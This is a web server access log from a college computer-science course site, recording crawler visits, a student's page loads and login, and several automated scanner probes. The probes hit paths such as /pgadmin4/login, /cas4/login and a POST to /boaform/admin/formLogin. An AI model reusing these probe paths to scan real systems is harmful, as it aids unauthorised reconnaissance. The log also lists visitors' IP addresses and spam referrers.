66.249.72.170 - - [01/May/2021:06:33:17 -0500] "GET /css/tooltip.css?datetime=20210501061727 HTTP/1.1" 200 2300 "https://cst.ridgewater.edu/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.130 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
71.191.45.156 - - [01/May/2021:06:37:12 -0500] "GET / HTTP/1.1" 301 185 "-" "-"
195.123.209.118 - - [01/May/2021:06:39:32 -0500] "GET / HTTP/1.1" 301 185 "http://regionshop.biz/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)"
195.123.209.118 - - [01/May/2021:06:39:33 -0500] "GET / HTTP/1.1" 301 185 "http://regionshop.biz/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)"
195.123.209.118 - - [01/May/2021:06:39:33 -0500] "GET / HTTP/1.1" 301 185 "http://regionshop.biz/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)"
66.249.72.170 - - [01/May/2021:06:39:35 -0500] "GET /Course/?Course=CST1794 HTTP/1.1" 200 5476 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.130 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
222.122.190.76 - - [01/May/2021:06:39:53 -0500] "GET / HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Windows NT 10.0; ZumBot/1.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
222.122.190.76 - - [01/May/2021:06:39:55 -0500] "GET / HTTP/1.1" 200 12397 "-" "Mozilla/5.0 (Windows NT 10.0; ZumBot/1.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
222.122.190.76 - - [01/May/2021:06:39:55 -0500] "GET / HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Windows NT 10.0; ZumBot/1.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
222.122.190.76 - - [01/May/2021:06:39:56 -0500] "GET / HTTP/1.1" 200 12396 "-" "Mozilla/5.0 (Windows NT 10.0; ZumBot/1.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
222.122.190.76 - - [01/May/2021:06:39:57 -0500] "GET /robots.txt HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; Windows NT 6.1?; ZumBot/1.0; http://help.zum.com/inquiry)"
222.122.190.76 - - [01/May/2021:06:39:57 -0500] "GET /robots.txt HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; Windows NT 6.1?; ZumBot/1.0; http://help.zum.com/inquiry)"
207.46.13.112 - - [01/May/2021:06:40:26 -0500] "GET /css/CST.css?datetime=20210427053757 HTTP/1.1" 200 24467 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.98 - - [01/May/2021:06:40:32 -0500] "GET /css/debug.css?datetime=20210427053757 HTTP/1.1" 200 17 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.102 - - [01/May/2021:06:40:36 -0500] "GET /css/tooltip.css?datetime=20210427053757 HTTP/1.1" 200 2300 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.72.166 - - [01/May/2021:06:47:16 -0500] "GET /JimMartinson/CST1025/Resources/Software/Pennacchi_The_Killer_Toolset.pdf HTTP/1.1" 200 6204477 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.84 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.13.149 - - [01/May/2021:06:52:14 -0500] "GET /_work/Table-UpperRightCornerA.psd HTTP/1.1" 200 11019 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.72.168 - - [01/May/2021:06:57:15 -0500] "GET /JimMartinson/CST1025/Resources/ComputerNetworks.pdf HTTP/1.1" 200 6817074 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.84 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
40.77.189.65 - - [01/May/2021:07:11:28 -0500] "GET /JimMartinson/CST2505/Schedule.php HTTP/1.1" 200 7109 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
40.77.189.65 - - [01/May/2021:07:11:28 -0500] "GET /css/debug.css?datetime=20210501071128 HTTP/1.1" 200 17 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
40.77.190.100 - - [01/May/2021:07:11:28 -0500] "GET /css/CST.css?datetime=20210501071128 HTTP/1.1" 200 24467 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
40.77.188.254 - - [01/May/2021:07:11:28 -0500] "GET /js/div.js?i&datetime=20210501071128 HTTP/1.1" 200 7433 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
40.77.190.14 - - [01/May/2021:07:11:28 -0500] "GET /js/CST.js?S&datetime=20210501071128 HTTP/1.1" 200 12049 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
40.77.190.68 - - [01/May/2021:07:11:28 -0500] "GET /css/tooltip.css?datetime=20210501071128 HTTP/1.1" 200 2300 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
40.77.189.65 - - [01/May/2021:07:11:28 -0500] "GET /js/CollapsibleLists.js?o&datetime=20210501071128 HTTP/1.1" 200 1018 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
40.77.190.14 - - [01/May/2021:07:11:28 -0500] "GET /js/tooltip.js?o&datetime=20210501071128 HTTP/1.1" 200 13888 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
40.77.190.100 - - [01/May/2021:07:11:28 -0500] "GET /js/encode.js?n&datetime=20210501071128 HTTP/1.1" 200 2957 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
40.77.189.34 - - [01/May/2021:07:11:28 -0500] "GET /js/debug.js?e&datetime=20210501071128 HTTP/1.1" 200 10964 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
114.119.148.94 - - [01/May/2021:07:11:48 -0500] "GET /jeffpolman/CST2823/resources HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.148.94 - - [01/May/2021:07:11:49 -0500] "GET /jeffpolman/CST2823/resources HTTP/1.1" 404 169 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.72.170 - - [01/May/2021:07:12:20 -0500] "GET /js/tooltip.js?o&datetime=20210501060858 HTTP/1.1" 200 13888 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/89.0.4389.130 Safari/537.36"
207.46.13.66 - - [01/May/2021:07:15:39 -0500] "GET /JimMartinson/CST1510/Technical%20Reference/Technical%20Reference.pdf HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
194.48.199.121 - - [01/May/2021:07:26:52 -0500] "GET /cas4/login HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
40.77.167.98 - - [01/May/2021:07:27:01 -0500] "GET /Credentials/2003-04/NetworkSystemsAdministrationDiploma.04.pdf HTTP/1.1" 200 34124 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.47 - - [01/May/2021:07:27:40 -0500] "GET /robots.txt HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.47 - - [01/May/2021:07:27:40 -0500] "GET /robots.txt HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.61 - - [01/May/2021:07:27:55 -0500] "GET /jeffpolman/CST2840/resources/presentations/ch05.ppt HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
104.198.141.65 - - [01/May/2021:07:28:45 -0500] "GET /jeffpolman/CST1700/resources/CiscoCommandRef.pdf HTTP/1.1" 301 185 "-" "Go-http-client/1.1"
104.198.141.65 - - [01/May/2021:07:28:45 -0500] "GET /jeffpolman/CST1700/resources/CiscoCommandRef.pdf HTTP/1.1" 404 169 "http://cst.ridgewater.edu/jeffpolman/CST1700/resources/CiscoCommandRef.pdf" "Go-http-client/1.1"
40.77.167.98 - - [01/May/2021:07:32:59 -0500] "GET /JimMartinson/CST1600/Schedule/ HTTP/1.1" 200 7100 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.100 - - [01/May/2021:07:33:24 -0500] "GET / HTTP/1.1" 200 12396 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
114.119.141.201 - - [01/May/2021:07:35:28 -0500] "GET /robots.txt HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
207.46.13.98 - - [01/May/2021:07:40:12 -0500] "GET /JimMartinson/CST1025/Resources/ComputerNetworks/mininet.html HTTP/1.1" 200 191684 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
114.119.137.125 - - [01/May/2021:07:40:14 -0500] "GET /robots.txt HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
185.191.171.4 - - [01/May/2021:07:41:41 -0500] "GET /robots.txt HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.19 - - [01/May/2021:07:41:41 -0500] "GET /JimMartinson/CST1025/Resources/ComputerNetworks/packets.html HTTP/1.1" 200 55329 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
194.48.199.121 - - [01/May/2021:07:44:09 -0500] "GET /pgadmin4/login?next=/pgadmin4/ HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
114.119.150.90 - - [01/May/2021:07:46:09 -0500] "GET /JimMartinson/CST1025/Resources/Links/Introduction%20to%20Computer%20Networking.URL HTTP/1.1" 200 5 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
40.77.167.70 - - [01/May/2021:07:49:24 -0500] "GET /jeffpolman/MMDT1001/resources/fall2011webex.recordings/D2L.Lab1.1.wrf HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
34.94.5.119 - - [01/May/2021:07:51:32 -0500] "GET /jeffpolman/CST1700/resources/CiscoIOSConfigFundamentals.pdf HTTP/1.1" 301 185 "-" "Go-http-client/1.1"
34.94.5.119 - - [01/May/2021:07:51:32 -0500] "GET /jeffpolman/CST1700/resources/CiscoIOSConfigFundamentals.pdf HTTP/1.1" 404 169 "http://cst.ridgewater.edu/jeffpolman/CST1700/resources/CiscoIOSConfigFundamentals.pdf" "Go-http-client/1.1"
184.105.247.254 - - [01/May/2021:08:00:34 -0500] "GET / HTTP/1.1" 301 185 "-" "-"
34.121.182.57 - - [01/May/2021:08:00:49 -0500] "GET /jeffpolman/CST2840/resources/Wireless%20LAN%20Book/instructor's%20manual/ch01.doc HTTP/1.1" 301 185 "-" "Go-http-client/1.1"
34.121.182.57 - - [01/May/2021:08:00:49 -0500] "GET /jeffpolman/CST2840/resources/Wireless%20LAN%20Book/instructor's%20manual/ch01.doc HTTP/1.1" 404 169 "http://cst.ridgewater.edu/jeffpolman/CST2840/resources/Wireless%20LAN%20Book/instructor's%20manual/ch01.doc" "Go-http-client/1.1"
49.145.229.199 - - [01/May/2021:08:01:44 -0500] "GET / HTTP/1.1" 301 185 "-" "Screaming Frog SEO Spider/15.1"
40.77.167.98 - - [01/May/2021:08:04:32 -0500] "GET /jeffpolman/CST2845/resources/ppts/ch13.ppt HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
94.23.16.74 - - [01/May/2021:08:13:32 -0500] "GET /vmware/ HTTP/1.1" 301 185 "http://cst.ridgewater.edu/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/24.0.1309.0 Safari/537.17"
94.23.16.74 - - [01/May/2021:08:13:33 -0500] "GET /vmware/ HTTP/1.1" 200 6602 "http://cst.ridgewater.edu/vmware/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/24.0.1309.0 Safari/537.17"
5.34.180.192 - - [01/May/2021:08:15:14 -0500] "GET / HTTP/1.1" 301 185 "https://xxxasianporn.net/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; .NET CLR 1.1.4322)"
5.34.180.192 - - [01/May/2021:08:15:14 -0500] "GET / HTTP/1.1" 301 185 "https://xxxasianporn.net/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; .NET CLR 1.1.4322)"
5.34.180.192 - - [01/May/2021:08:15:15 -0500] "GET / HTTP/1.1" 301 185 "https://xxxasianporn.net/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; .NET CLR 1.1.4322)"
78.31.166.163 - - [01/May/2021:08:15:28 -0500] "GET / HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
173.22.164.239 - - [01/May/2021:08:15:57 -0500] "GET /js/CST.js?S&datetime=20210428090248 HTTP/1.1" 304 0 "https://cst.ridgewater.edu/JimMartinson/MMDT1021/?Assignments" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
173.22.164.239 - - [01/May/2021:08:15:57 -0500] "GET /js/CST.js?S&datetime=20210428090245 HTTP/1.1" 304 0 "https://cst.ridgewater.edu/JimMartinson/MMDT1021/Labs/Lab09/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
209.141.33.74 - - [01/May/2021:08:16:30 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 301 185 "http://134.29.175.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
209.141.33.74 - - [01/May/2021:08:16:30 -0500] "" 400 0 "-" "-"
66.249.72.170 - - [01/May/2021:08:18:16 -0500] "GET / HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
40.77.167.70 - - [01/May/2021:08:29:08 -0500] "GET /jeffpolman/CST2702/resources/CST2702%20Lab%20Checkoff%20sheet%20Packet%20tracer%20version.doc HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
185.191.171.10 - - [01/May/2021:08:29:23 -0500] "GET /JimMartinson/CST1025/Resources/Links/NetworkConfiguration/_notes/ HTTP/1.1" 200 408 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
40.77.167.70 - - [01/May/2021:08:30:22 -0500] "GET /JimMartinson/CST1611/ HTTP/1.1" 200 9872 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.100 - - [01/May/2021:08:31:47 -0500] "GET /JimMartinson/CST1025/ HTTP/1.1" 200 9851 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
172.58.86.207 - - [01/May/2021:08:40:57 -0500] "GET /JimMartinson/ HTTP/1.1" 200 11812 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:40:57 -0500] "GET /css/CST.css?datetime=20210501084057 HTTP/1.1" 200 24467 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:40:57 -0500] "GET /js/div.js?i&datetime=20210501084057 HTTP/1.1" 200 7433 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:40:57 -0500] "GET /css/debug.css?datetime=20210501084057 HTTP/1.1" 200 17 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:40:57 -0500] "GET /js/CollapsibleLists.js?o&datetime=20210501084057 HTTP/1.1" 200 1018 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:40:57 -0500] "GET /js/debug.js?e&datetime=20210501084057 HTTP/1.1" 200 10964 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:40:57 -0500] "GET /css/tooltip.css?datetime=20210501084057 HTTP/1.1" 200 2300 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:40:57 -0500] "GET /js/tooltip.js?o&datetime=20210501084057 HTTP/1.1" 200 13888 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:40:57 -0500] "GET /js/CST.js?S&datetime=20210501084057 HTTP/1.1" 200 12049 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:41:01 -0500] "GET /JimMartinson/CST1611/ HTTP/1.1" 200 9873 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:41:01 -0500] "GET /css/CST.css?datetime=20210501084101 HTTP/1.1" 200 24467 "https://cst.ridgewater.edu/JimMartinson/CST1611/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:41:01 -0500] "GET /js/CollapsibleLists.js?o&datetime=20210501084101 HTTP/1.1" 200 1018 "https://cst.ridgewater.edu/JimMartinson/CST1611/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:41:01 -0500] "GET /js/openCenteredWindow.js?p&datetime=20210501084101 HTTP/1.1" 200 3771 "https://cst.ridgewater.edu/JimMartinson/CST1611/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:41:01 -0500] "GET /js/div.js?i&datetime=20210501084101 HTTP/1.1" 200 7433 "https://cst.ridgewater.edu/JimMartinson/CST1611/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:41:01 -0500] "GET /css/printing.css?datetime=20210501084101 HTTP/1.1" 200 5910 "https://cst.ridgewater.edu/JimMartinson/CST1611/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:41:01 -0500] "GET /js/CST.js?S&datetime=20210501084101 HTTP/1.1" 200 12049 "https://cst.ridgewater.edu/JimMartinson/CST1611/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:41:06 -0500] "GET /JimMartinson/CST1611/?Assignments HTTP/1.1" 200 7158 "https://cst.ridgewater.edu/JimMartinson/CST1611/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:41:06 -0500] "GET /css/CST.css?datetime=20210501084106 HTTP/1.1" 200 24467 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:41:06 -0500] "GET /js/div.js?i&datetime=20210501084106 HTTP/1.1" 200 7433 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:41:06 -0500] "GET /js/CollapsibleLists.js?o&datetime=20210501084106 HTTP/1.1" 200 1018 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:41:06 -0500] "GET /css/debug.css?datetime=20210501084106 HTTP/1.1" 200 17 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:41:06 -0500] "GET /css/tooltip.css?datetime=20210501084106 HTTP/1.1" 200 2300 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:41:06 -0500] "GET /js/CST.js?S&datetime=20210501084106 HTTP/1.1" 200 12049 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:41:06 -0500] "GET /js/debug.js?e&datetime=20210501084106 HTTP/1.1" 200 10964 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:41:06 -0500] "GET /js/tooltip.js?o&datetime=20210501084106 HTTP/1.1" 200 13888 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:41:06 -0500] "GET /js/encode.js?n&datetime=20210501084106 HTTP/1.1" 200 2957 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:41:13 -0500] "POST /Login/ HTTP/1.1" 200 387 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:41:13 -0500] "POST /JimMartinson/CST1611/?Assignments HTTP/1.1" 200 24724 "https://cst.ridgewater.edu/Login/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:41:14 -0500] "GET /js/CST.js?S&datetime=20210501084113 HTTP/1.1" 200 12049 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:41:14 -0500] "GET /js/div.js?i&datetime=20210501084113 HTTP/1.1" 200 7433 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:41:14 -0500] "GET /js/CollapsibleLists.js?o&datetime=20210501084113 HTTP/1.1" 200 1018 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:41:14 -0500] "GET /css/CST.css?datetime=20210501084113 HTTP/1.1" 200 24467 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
